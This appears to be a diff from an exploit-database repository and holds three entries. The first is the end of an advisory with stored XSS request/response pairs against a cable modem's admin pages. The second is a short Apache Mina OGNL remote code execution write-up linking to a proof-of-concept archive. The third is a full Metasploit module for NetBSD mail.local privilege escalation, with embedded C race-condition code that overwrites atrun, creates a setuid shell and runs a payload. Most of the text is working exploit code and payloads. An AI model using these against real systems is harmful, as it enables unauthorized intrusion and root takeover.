Referer: http://192.168.100.1/Rg_ParentalBasic.asp
|
||||
Cookie: Lang=en; SessionID=1320560
|
||||
Connection: close
|
||||
|
||||
#2 - Response:
|
||||
HTTP/1.1 200 OK
|
||||
Content-type: text/html
|
||||
Expires: Thu, 3 Oct 1968 12:00:00 GMT
|
||||
Pragma: no-cache
|
||||
Cache-Control: no-cache, must-revalidate
|
||||
Connection: close
|
||||
Content-Length: 10741
|
||||
(...)
|
||||
<select name="AllowedDomainList" size=5>
|
||||
<option value="1"><script>alert('XSS')</script>
|
||||
</select>
|
||||
(...)
|
||||
|
||||
|
||||
12. Stored XSS in Network Name (e.g Wireless -> Basic Settings)
|
||||
|
||||
#1 - Request:
|
||||
POST /goform/Quick_setup HTTP/1.1
|
||||
Host: 192.168.100.1
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: pl,en-US;q=0.7,en;q=0.3
|
||||
Accept-Encoding: gzip, deflate
|
||||
Referer: http://192.168.100.1/Quick_setup.asp
|
||||
Cookie: Lang=en; SessionID=1320560
|
||||
Connection: close
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 371
|
||||
|
||||
Password=&PasswordReEnter=&setup_wifi_enable=enable&ssid=%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&security_mode=psk2_mixed&wpa_enc=tkip%2Baes&wpa_psk_key=231503725&radius_ip_1=0&radius_ip_2=0&radius_ip_3=0&radius_ip_4=0&keysize=64&tx_key=1&save=Save+Settings&h_setup_wifi_enable=enable&h_security_mode=psk2_mixed&h_wpa_enc=tkip%2Baes&qs_wds_setting=disable&UserId=
|
||||
|
||||
#1 - Response:
|
||||
HTTP/1.0 302 Redirect
|
||||
Server: PS HTTP Server
|
||||
Location: http://192.168.100.1/Quick_setup.asp
|
||||
Content-type: text/html
|
||||
Connection: close
|
||||
|
||||
#2 - Request:
|
||||
GET /Wireless.asp HTTP/1.1
|
||||
Host: 192.168.100.1
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: pl,en-US;q=0.7,en;q=0.3
|
||||
Accept-Encoding: gzip, deflate
|
||||
Referer: http://192.168.100.1/Quick_setup.asp
|
||||
Cookie: Lang=en; SessionID=1320560
|
||||
Connection: close
|
||||
|
||||
#2 - Response:
|
||||
HTTP/1.1 200 OK
|
||||
Content-type: text/html
|
||||
Expires: Thu, 3 Oct 1968 12:00:00 GMT
|
||||
Pragma: no-cache
|
||||
Cache-Control: no-cache, must-revalidate
|
||||
Connection: close
|
||||
Content-Length: 51653
|
||||
(...)
|
||||
<tr>
|
||||
<td>
|
||||
<B><script language="javascript" type="text/javascript">dw(vwnetwork_name);</script></B>
|
||||
</td>
|
||||
<td colspan="2">
|
||||
<script>alert('XSS')</script>
|
||||
</td>
|
||||
</tr>
|
||||
(...)
|
||||
|
||||
|
||||
13. Stored XSS in DDNS Settings (Setup -> DDNS)
|
||||
|
||||
#1 - Request:
|
||||
POST /goform/Setup_DDNS HTTP/1.1
|
||||
Host: 192.168.100.1
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: pl,en-US;q=0.7,en;q=0.3
|
||||
Accept-Encoding: gzip, deflate
|
||||
Referer: http://192.168.100.1/Setup_DDNS.asp
|
||||
Cookie: Lang=en; SessionID=1320560
|
||||
Connection: close
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 154
|
||||
|
||||
DdnsService=0&DdnsUserName=user" onmouseover=alert('XSS_1') x="&DdnsPassword=aaa x="&DdnsHostName=host" onmouseover=alert('XSS_2') x="y&save=Save+Settings
|
||||
|
||||
#1 - Response:
|
||||
HTTP/1.0 302 Redirect
|
||||
Server: PS HTTP Server
|
||||
Location: http://192.168.100.1/Setup_DDNS.asp
|
||||
Content-type: text/html
|
||||
Connection: close
|
||||
|
||||
#2 - Request:
|
||||
GET /Setup_DDNS.asp HTTP/1.1
|
||||
Host: 192.168.100.1
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: pl,en-US;q=0.7,en;q=0.3
|
||||
Accept-Encoding: gzip, deflate
|
||||
Referer: http://192.168.100.1/Setup_DDNS.asp
|
||||
Cookie: Lang=en; SessionID=1320560
|
||||
Connection: close
|
||||
|
||||
#2 - Response:
|
||||
HTTP/1.1 200 OK
|
||||
Content-type: text/html
|
||||
Expires: Thu, 3 Oct 1968 12:00:00 GMT
|
||||
Pragma: no-cache
|
||||
Cache-Control: no-cache, must-revalidate
|
||||
Connection: close
|
||||
Content-Length: 5738
|
||||
(...)
|
||||
<td>
|
||||
<input name="DdnsUserName" type="text" size="16" maxlength="64" value="user" onmouseover=alert('XSS_1') x="" />
|
||||
</td>
|
||||
(...)
|
||||
<td>
|
||||
<input name="DdnsHostName" type="text" size="32" maxlength="256" value="host" onmouseover=alert('XSS_2') x="y" />
|
||||
</td>
|
||||
(...)
|
||||
|
||||
|
||||
14. Stored XSS in Adv. VPN Setup (Security -> VPN -> Advanced Settings)
|
||||
|
||||
#1 - Request:
|
||||
POST /goform/vpn_adv HTTP/1.1
|
||||
Host: 192.168.100.1
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: pl,en-US;q=0.7,en;q=0.3
|
||||
Accept-Encoding: gzip, deflate
|
||||
Referer: http://192.168.100.1/vpn_adv.asp
|
||||
Cookie: Lang=en; SessionID=1320560
|
||||
Connection: close
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 286
|
||||
|
||||
NegotiationMode=0&LocalIdentityType=2&LocalIdentity=abc%22+onmouseover%3Dalert%28%27XSS%27%29+x%3D%22y&RemoteIdentityType=2&RemoteIdentity=abc%22+onmouseover%3Dalert%28%27XSS%27%29+x%3D%22y&Phase1Encryption=2&Phase1Authentication=1&Phase1DhGroup=0&Phase1SaLifetime=28800&Phase2DhGroup=0
|
||||
|
||||
#1 - Response:
|
||||
HTTP/1.0 302 Redirect
|
||||
Server: PS HTTP Server
|
||||
Location: http://192.168.100.1/vpn_adv.asp
|
||||
Content-type: text/html
|
||||
Connection: close
|
||||
|
||||
#2 - Request:
|
||||
GET /vpn_adv.asp HTTP/1.1
|
||||
Host: 192.168.100.1
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: pl,en-US;q=0.7,en;q=0.3
|
||||
Accept-Encoding: gzip, deflate
|
||||
Referer: http://192.168.100.1/vpn_adv.asp
|
||||
Cookie: Lang=en; SessionID=1320560
|
||||
Connection: close
|
||||
|
||||
#2 - Response:
|
||||
HTTP/1.1 200 OK
|
||||
Content-type: text/html
|
||||
Expires: Thu, 3 Oct 1968 12:00:00 GMT
|
||||
Pragma: no-cache
|
||||
Cache-Control: no-cache, must-revalidate
|
||||
Connection: close
|
||||
Content-Length: 10179
|
||||
(...)
|
||||
<td>
|
||||
<input type="radio" name="LocalIdentityType" value="2" onClick="LocalIdentityTypeClicked();" />
|
||||
<script language="javascript" type="text/javascript">dw(vs_identity_name);</script>
|
||||
<input type="text" name="LocalIdentity" size="16" maxlength="32" value="abc" onmouseover=alert('XSS') x="y" />
|
||||
</td>
|
||||
(...)
|
||||
<tr>
|
||||
<td>
|
||||
<input type="radio" name="RemoteIdentityType" value="2" onClick="RemoteIdentityTypeClicked();">
|
||||
<script language="javascript" type="text/javascript">dw(vs_identity_name);</script>
|
||||
<input type="text" name="RemoteIdentity" size="16" maxlength="32" value="abc" onmouseover=alert('XSS') x="y" />
|
||||
</td>
|
||||
</tr>
|
||||
(...)
|
33
platforms/java/webapps/40384.txt
Executable file
33
platforms/java/webapps/40384.txt
Executable file
|
@ -0,0 +1,33 @@
|
|||
Apache Mina 2.0.13 - Remote Command Execution
|
||||
|
||||
Abstract
|
||||
|
||||
Apache Mina 2.0.13 uses the OGNL library in the “IoSessionFinder” class. Its constructor takes into parameter one OGNL expression. Then this expression is executed when the method “find” is called. This class seems to be only used in the JMX MINA component “IoServiceMBean”. When the IOServiceMBean is exposed trough JMX it is possible to abuse the function to execute an arbitrary command on the server.
|
||||
|
||||
Description
|
||||
|
||||
The function “find” in the “IoSessionFinder” class executes an arbitrary OGNL expression (Ognl.getValue(….)) defined in its constructor.
|
||||
|
||||
|
||||
|
||||
Conclusion
|
||||
|
||||
This vulnerability shows that Expression languages vulnerabilities are still present in Java libraries and can have a big impact even if it is in this case the vulnerability can only exploited in specific conditions.
|
||||
|
||||
Regarding the fix, the Apache Mina team didn't request a CVE neither acknowledged the vulnerability but I confirm that the vulnerability is fixed is the last version.
|
||||
|
||||
Timelines
|
||||
|
||||
30/03/2016: First email to disclose the vulnerability to the Apache Security Team
|
||||
31/03/2016: Acknowledgment from the Apache Mina team for the email reception and saying the vulnerability is under investigation
|
||||
21/05/2016: Email from the Apache Mina saying that they look for possible remediations
|
||||
12/08/2016: Email from the Apache Mina suggesting a solution
|
||||
29/08/2016: Email from my side saying that the remediation looks good
|
||||
30/08/2016: Apache Mina team published the new version fixing the issue.
|
||||
|
||||
|
||||
PS: I have included two archives containing the two proofs of concept.
|
||||
|
||||
Proof of Concept:
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40384.zip
|
||||
|
330
platforms/netbsd_x86/local/40385.rb
Executable file
330
platforms/netbsd_x86/local/40385.rb
Executable file
|
@ -0,0 +1,330 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require "msf/core"
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Local
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Post::File
|
||||
include Msf::Exploit::FileDropper
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'NetBSD mail.local Privilege Escalation',
|
||||
'Description' => %q{
|
||||
This module attempts to exploit a race condition in mail.local with SUID bit set on:
|
||||
NetBSD 7.0 - 7.0.1 (verified on 7.0.1)
|
||||
NetBSD 6.1 - 6.1.5
|
||||
NetBSD 6.0 - 6.0.6
|
||||
Successful exploitation relies on a crontab job with root privilege, which may take up to 10min to execute.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'h00die <mike@stcyrsecurity.com>', # Module
|
||||
'akat1' # Discovery
|
||||
],
|
||||
|
||||
'DisclosureDate' => 'Jul 07 2016',
|
||||
'Platform' => 'unix',
|
||||
'Arch' => ARCH_CMD,
|
||||
'SessionTypes' => %w{shell meterpreter},
|
||||
'Privileged' => true,
|
||||
'Payload' => {
|
||||
'Compat' => {
|
||||
'PayloadType' => 'cmd cmd_bash',
|
||||
'RequiredCmd' => 'generic openssl'
|
||||
}
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Automatic Target', {}]
|
||||
],
|
||||
'DefaultTarget' => 0,
|
||||
'DefaultOptions' => { 'WfsDelay' => 603 }, #can take 10min for cron to kick
|
||||
'References' =>
|
||||
[
|
||||
[ "URL", "http://akat1.pl/?id=2"],
|
||||
[ "EDB", "40141"],
|
||||
[ "CVE", "2016-6253"],
|
||||
[ "URL", "http://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2016-006.txt.asc"]
|
||||
]
|
||||
))
|
||||
register_options([
|
||||
OptString.new('ATRUNPATH', [true, 'Location of atrun binary', '/usr/libexec/atrun']),
|
||||
OptString.new('MAILDIR', [true, 'Location of mailboxes', '/var/mail']),
|
||||
OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),
|
||||
OptInt.new('ListenerTimeout', [true, 'Number of seconds to wait for the exploit', 603])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def exploit
|
||||
# lots of this file's format is based on pkexec.rb
|
||||
|
||||
# direct copy of code from exploit-db
|
||||
main = %q{
|
||||
// Source: http://akat1.pl/?id=2
|
||||
|
||||
#include <stdio.h>
|
||||
#include <unistd.h>
|
||||
#include <fcntl.h>
|
||||
#include <signal.h>
|
||||
#include <stdlib.h>
|
||||
#include <string.h>
|
||||
#include <err.h>
|
||||
#include <sys/wait.h>
|
||||
|
||||
#define ATRUNPATH "/usr/libexec/atrun"
|
||||
#define MAILDIR "/var/mail"
|
||||
|
||||
static int
|
||||
overwrite_atrun(void)
|
||||
{
|
||||
char *script = "#! /bin/sh\n"
|
||||
"cp /bin/ksh /tmp/ksh\n"
|
||||
"chmod +s /tmp/ksh\n";
|
||||
size_t size;
|
||||
FILE *fh;
|
||||
int rv = 0;
|
||||
|
||||
fh = fopen(ATRUNPATH, "wb");
|
||||
|
||||
if (fh == NULL) {
|
||||
rv = -1;
|
||||
goto out;
|
||||
}
|
||||
|
||||
size = strlen(script);
|
||||
if (size != fwrite(script, 1, strlen(script), fh)) {
|
||||
rv = -1;
|
||||
goto out;
|
||||
}
|
||||
|
||||
out:
|
||||
if (fh != NULL && fclose(fh) != 0)
|
||||
rv = -1;
|
||||
|
||||
return rv;
|
||||
}
|
||||
|
||||
static int
|
||||
copy_file(const char *from, const char *dest, int create)
|
||||
{
|
||||
char buf[1024];
|
||||
FILE *in = NULL, *out = NULL;
|
||||
size_t size;
|
||||
int rv = 0, fd;
|
||||
|
||||
in = fopen(from, "rb");
|
||||
if (create == 0)
|
||||
out = fopen(dest, "wb");
|
||||
else {
|
||||
fd = open(dest, O_WRONLY | O_EXCL | O_CREAT, S_IRUSR | S_IWUSR);
|
||||
if (fd == -1) {
|
||||
rv = -1;
|
||||
goto out;
|
||||
}
|
||||
out = fdopen(fd, "wb");
|
||||
}
|
||||
|
||||
if (in == NULL || out == NULL) {
|
||||
rv = -1;
|
||||
goto out;
|
||||
}
|
||||
|
||||
while ((size = fread(&buf, 1, sizeof(buf), in)) > 0) {
|
||||
if (fwrite(&buf, 1, size, in) != 0) {
|
||||
rv = -1;
|
||||
goto out;
|
||||
}
|
||||
}
|
||||
|
||||
out:
|
||||
if (in != NULL && fclose(in) != 0)
|
||||
rv = -1;
|
||||
if (out != NULL && fclose(out) != 0)
|
||||
rv = -1;
|
||||
return rv;
|
||||
}
|
||||
|
||||
int
|
||||
main()
|
||||
{
|
||||
pid_t pid;
|
||||
uid_t uid;
|
||||
struct stat sb;
|
||||
char *login, *mailbox, *mailbox_backup = NULL, *atrun_backup, *buf;
|
||||
|
||||
umask(0077);
|
||||
|
||||
login = getlogin();
|
||||
|
||||
if (login == NULL)
|
||||
err(EXIT_FAILURE, "who are you?");
|
||||
|
||||
uid = getuid();
|
||||
|
||||
asprintf(&mailbox, MAILDIR "/%s", login);
|
||||
|
||||
if (mailbox == NULL)
|
||||
err(EXIT_FAILURE, NULL);
|
||||
|
||||
if (access(mailbox, F_OK) != -1) {
|
||||
/* backup mailbox */
|
||||
asprintf(&mailbox_backup, "/tmp/%s", login);
|
||||
if (mailbox_backup == NULL)
|
||||
err(EXIT_FAILURE, NULL);
|
||||
}
|
||||
|
||||
if (mailbox_backup != NULL) {
|
||||
fprintf(stderr, "[+] backup mailbox %s to %s\n", mailbox, mailbox_backup);
|
||||
if (copy_file(mailbox, mailbox_backup, 1))
|
||||
err(EXIT_FAILURE, "[-] failed");
|
||||
}
|
||||
|
||||
/* backup atrun(1) */
|
||||
atrun_backup = strdup("/tmp/atrun");
|
||||
if (atrun_backup == NULL)
|
||||
err(EXIT_FAILURE, NULL);
|
||||
|
||||
fprintf(stderr, "[+] backup atrun(1) %s to %s\n", ATRUNPATH, atrun_backup);
|
||||
|
||||
if (copy_file(ATRUNPATH, atrun_backup, 1))
|
||||
err(EXIT_FAILURE, "[-] failed");
|
||||
|
||||
/* win the race */
|
||||
fprintf(stderr, "[+] try to steal %s file\n", ATRUNPATH);
|
||||
|
||||
switch (pid = fork()) {
|
||||
case -1:
|
||||
err(EXIT_FAILURE, NULL);
|
||||
/* NOTREACHED */
|
||||
case 0:
|
||||
asprintf(&buf, "echo x | /usr/libexec/mail.local -f xxx %s "
|
||||
"2> /dev/null", login);
|
||||
|
||||
for(;;)
|
||||
system(buf);
|
||||
/* NOTREACHED */
|
||||
|
||||
default:
|
||||
umask(0022);
|
||||
for(;;) {
|
||||
int fd;
|
||||
unlink(mailbox);
|
||||
symlink(ATRUNPATH, mailbox);
|
||||
sync();
|
||||
unlink(mailbox);
|
||||
fd = open(mailbox, O_CREAT, S_IRUSR | S_IWUSR);
|
||||
close(fd);
|
||||
sync();
|
||||
if (lstat(ATRUNPATH, &sb) == 0) {
|
||||
if (sb.st_uid == uid) {
|
||||
kill(pid, 9);
|
||||
fprintf(stderr, "[+] won race!\n");
|
||||
break;
|
||||
}
|
||||
}
|
||||
}
|
||||
break;
|
||||
}
|
||||
(void)waitpid(pid, NULL, 0);
|
||||
|
||||
if (mailbox_backup != NULL) {
|
||||
/* restore mailbox */
|
||||
fprintf(stderr, "[+] restore mailbox %s to %s\n", mailbox_backup, mailbox);
|
||||
|
||||
if (copy_file(mailbox_backup, mailbox, 0))
|
||||
err(EXIT_FAILURE, "[-] failed");
|
||||
if (unlink(mailbox_backup) != 0)
|
||||
err(EXIT_FAILURE, "[-] failed");
|
||||
}
|
||||
|
||||
/* overwrite atrun */
|
||||
fprintf(stderr, "[+] overwriting atrun(1)\n");
|
||||
|
||||
if (chmod(ATRUNPATH, 0755) != 0)
|
||||
err(EXIT_FAILURE, NULL);
|
||||
|
||||
if (overwrite_atrun())
|
||||
err(EXIT_FAILURE, NULL);
|
||||
|
||||
fprintf(stderr, "[+] waiting for atrun(1) execution...\n");
|
||||
|
||||
for(;;sleep(1)) {
|
||||
if (access("/tmp/ksh", F_OK) != -1)
|
||||
break;
|
||||
}
|
||||
|
||||
/* restore atrun */
|
||||
fprintf(stderr, "[+] restore atrun(1) %s to %s\n", atrun_backup, ATRUNPATH);
|
||||
|
||||
if (copy_file(atrun_backup, ATRUNPATH, 0))
|
||||
err(EXIT_FAILURE, "[-] failed");
|
||||
if (unlink(atrun_backup) != 0)
|
||||
err(EXIT_FAILURE, "[-] failed");
|
||||
|
||||
if (chmod(ATRUNPATH, 0555) != 0)
|
||||
err(EXIT_FAILURE, NULL);
|
||||
|
||||
fprintf(stderr, "[+] done! Don't forget to change atrun(1) "
|
||||
"ownership.\n");
|
||||
fprintf(stderr, "Enjoy your shell:\n");
|
||||
|
||||
execl("/tmp/ksh", "ksh", NULL);
|
||||
|
||||
return 0;
|
||||
}
|
||||
}
|
||||
# patch in our variable maildir and atrunpath
|
||||
main.gsub!(/#define ATRUNPATH "\/usr\/libexec\/atrun"/,
|
||||
"#define ATRUNPATH \"#{datastore["ATRUNPATH"]}\"")
|
||||
main.gsub!(/#define MAILDIR "\/var\/mail"/,
|
||||
"#define MAILDIR \"#{datastore["MAILDIR"]}\"")
|
||||
|
||||
executable_path = "#{datastore["WritableDir"]}/#{rand_text_alpha(8)}"
|
||||
payload_file = "#{rand_text_alpha(8)}"
|
||||
payload_path = "#{datastore["WritableDir"]}/#{payload_file}"
|
||||
vprint_status("Writing Payload to #{payload_path}")
|
||||
# patch in to run our payload as part of ksh
|
||||
main.gsub!(/execl\("\/tmp\/ksh", "ksh", NULL\);/,
|
||||
"execl(\"/tmp/ksh\", \"ksh\", \"#{payload_path}\", NULL);")
|
||||
|
||||
write_file(payload_path, payload.encoded)
|
||||
cmd_exec("chmod 555 #{payload_path}")
|
||||
register_file_for_cleanup(payload_path)
|
||||
|
||||
print_status "Writing exploit to #{executable_path}.c"
|
||||
|
||||
# clean previous bad attempts to prevent c code from exiting
|
||||
rm_f executable_path
|
||||
rm_f '/tmp/atrun'
|
||||
whoami = cmd_exec('whoami')
|
||||
rm_f "/tmp/#{whoami}"
|
||||
|
||||
write_file("#{executable_path}.c", main)
|
||||
print_status("Compiling #{executable_path}.c via gcc")
|
||||
output = cmd_exec("/usr/bin/gcc -o #{executable_path}.out #{executable_path}.c")
|
||||
output.each_line { |line| vprint_status(line.chomp) }
|
||||
|
||||
print_status('Starting the payload handler...')
|
||||
handler({})
|
||||
|
||||
print_status("Executing at #{Time.now}. May take up to 10min for callback")
|
||||
output = cmd_exec("chmod +x #{executable_path}.out; #{executable_path}.out")
|
||||
output.each_line { |line| vprint_status(line.chomp) }
|
||||
|
||||
# our sleep timer
|
||||
stime = Time.now.to_f
|
||||
until session_created? || stime + datastore['ListenerTimeout'] < Time.now.to_f
|
||||
Rex.sleep(1)
|
||||
end
|
||||
print_status("#{Time.now}")
|
||||
register_file_for_cleanup(executable_path)
|
||||
register_file_for_cleanup("#{executable_path}.out")
|
||||
print_status("Remember to run: chown root:wheel #{datastore["ATRUNPATH"]}")
|
||||
end
|
||||
end
|
Loading…
Add table
Reference in a new issue